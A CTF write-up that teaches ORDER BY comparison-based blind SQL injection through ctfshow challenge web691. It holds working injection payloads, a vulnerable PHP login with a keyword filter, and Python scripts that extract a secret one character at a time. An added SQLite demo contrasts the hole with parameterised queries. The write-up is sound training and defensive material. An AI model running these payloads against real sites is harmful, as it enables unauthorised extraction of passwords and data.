SQL ORDER BY comparison-based blind injection
While working on ctfshow web beginner challenge web691, I ran into a blind SQL injection that leaks data through ORDER BY size comparisons. Since this was my first time meeting it, I'm writing it down.

Before tackling the challenge, let's first look at how ORDER BY comparison blind injection works.
Set up a database locally first.

Enter this query:
SELECT * FROM `login` WHERE name=1 or 1 union SELECT 1,1,1 order by 3;

Now change the query:
SELECT * FROM `login` WHERE name=1 or 1 union SELECT 1,1,2 order by 3;

The effect is obvious here: ORDER BY 3 sorts the result on the passwd column, so when the passwd value supplied through the UNION is 1 (smaller than the real passwd), the first row returned is the injected one, name=1; when the supplied passwd value is 2 (larger than the real passwd), the first row returned is the real record, name=admin. In practice we do not know the passwd value, but the application replies with a "wrong password" message whenever the real row comes first, so that response tells us whether our guess is above or below the real value and lets us brute-force the password one character at a time.
import requests

# Constructed placeholder: replace with the URL of the local test page
url = "http://TARGET/"
s = '0123456789:abcdefghijklmnopqrstuvwxyz{'
password = ''
for i in range(50):
    for j in s:
        payload = password + j
        data = {
            'username': "'or 1 union select 1,1,'" + payload + "' order by 3#",
            'passwd': ''
        }
        r = requests.post(url, data=data)
        if "wrong pass!" in r.text:
            # "wrong pass!" means the real row sorted first, i.e. payload > real password,
            # so the real character is the one just below j in ASCII. This only holds
            # when s has no gap directly below j (e.g. '`' between ':' and 'a' is missed).
            password += chr(ord(j) - 1)
            print(password)
            break
Back to the original challenge:
<?php
include('inc.php');
highlight_file(__FILE__);
error_reporting(0);
function filter($str){
    $filterlist = "/\(|\)|username|password|where|case|when|like|regexp|into|limit|=|for|;/";
    if(preg_match($filterlist,strtolower($str))){
        die("illegal input!");
    }
    return $str;
}
$username = isset($_POST['username'])?filter($_POST['username']):die("please input username!");
$password = isset($_POST['password'])?filter($_POST['password']):die("please input password!");
$sql = "select * from admin where username = '$username' and password = '$password' ";
$res = $conn -> query($sql);
if($res->num_rows>0){
    $row = $res -> fetch_assoc();
    if($row['id']){
        echo $row['username'];
    }
}else{
    echo "The content in the password column is the flag!";
}
?>
First we use ORDER BY to guess that there are 3 columns:
#username=1' or 1 union select 1,1 order by 2#&password=1
#echoes "The content in the password column is the flag!" (the UNION fails with a wrong column count, so no rows come back)
username=1' or 1 union select 1,1,1 order by 3#&password=1
The 3 columns are most likely id, username and password.
username=1' or 1 union select 1,1,'c' order by 3#&password=1

The response is 1, showing that the ASCII value of the 'c' we supplied is still smaller than the real first character.
username=1' or 1 union select 1,1,'d' order by 3#&password=1

admin is echoed successfully.
Note, though, that the real value is obtained by subtracting 1 from the ASCII code of the character that first makes admin appear.

As the screenshot showed, the first character of the real passwd is 1 less than that.
Straight to the script:
import requests

s = ".0123456789:abcdefghijklmnopqrstuvwxyz{|}~"
print(s)
url = "http://29a1ba96-4095-4b96-adbb-56e359b5e690.challenge.ctf.show/"
k = ""
for i in range(1, 50):
    print(i)
    for j in s:
        data = {
            'username': "' or 1 union select 1,1,'{0}' order by 3#".format(k + j),
            'password': '1'
        }
        r = requests.post(url, data=data)
        #print(data['username'])
        # highlight_file() ends its output with </code>, so "admin" directly after it
        # is the echoed username: the real row sorted first, i.e. k+j > the flag prefix.
        if "</code>admin" in r.text:
            # the real character is one ASCII value below j; this assumes s has no
            # gap directly below j (e.g. '_' is never found because '`' is not in s)
            k = k + chr(ord(j) - 1)
            print(k)
            break
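To make the oracle described in the local test and in the challenge walkthrough concrete from the defender's side, here is an added example (not code from the original post or from ctfshow) that rebuilds the admin table in an in-memory SQLite database and runs the same 'c' / 'd' probe against a string-spliced query and against a parameterised one. Assumed: the table has columns id, username, password with a constructed secret 'ctfshow{demo}', and SQLite's `--` comment replaces the `#` used in the page's MySQL payload.

```python
import sqlite3

FLAG_MSG = "The content in the password column is the flag!"


def make_db():
    """Constructed stand-in for the challenge's admin table (assumed columns id, username, password)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES (1, 'admin', 'ctfshow{demo}')")  # constructed secret
    return conn


def login_vulnerable(conn, username, password):
    """Mirrors the challenge PHP: input is spliced into the SQL text, so an
    injected UNION ... ORDER BY decides which row comes back first."""
    sql = (f"select * from admin where username = '{username}' "
           f"and password = '{password}'")
    row = conn.execute(sql).fetchone()
    return str(row[1]) if row and row[0] else FLAG_MSG


def login_hardened(conn, username, password):
    """Same check with bound parameters: the input is only ever a value to
    compare, never SQL text, so no ORDER BY can be injected."""
    sql = "select * from admin where username = ? and password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return str(row[1]) if row and row[0] else FLAG_MSG


def order_by_probe(conn, login, guess):
    """One probe of the page's technique: UNION a row carrying `guess` in the
    password column and sort on column 3 (SQLite comments with `--`)."""
    injected = f"' or 1 union select 1,1,'{guess}' order by 3 -- "
    return login(conn, injected, "1")


def demo():
    """Same two guesses as the writeup: 'c' sorts below the secret, 'd' above it."""
    conn = make_db()
    return {
        "vuln_below": order_by_probe(conn, login_vulnerable, "c"),  # "1": injected row first
        "vuln_above": order_by_probe(conn, login_vulnerable, "d"),  # "admin": real row first
        "hard_below": order_by_probe(conn, login_hardened, "c"),    # flag message: no oracle
        "hard_above": order_by_probe(conn, login_hardened, "d"),    # flag message: no oracle
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```

With bound parameters both probes fall through to the same "no such user" branch, so the response no longer depends on how the guess compares to the stored password.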
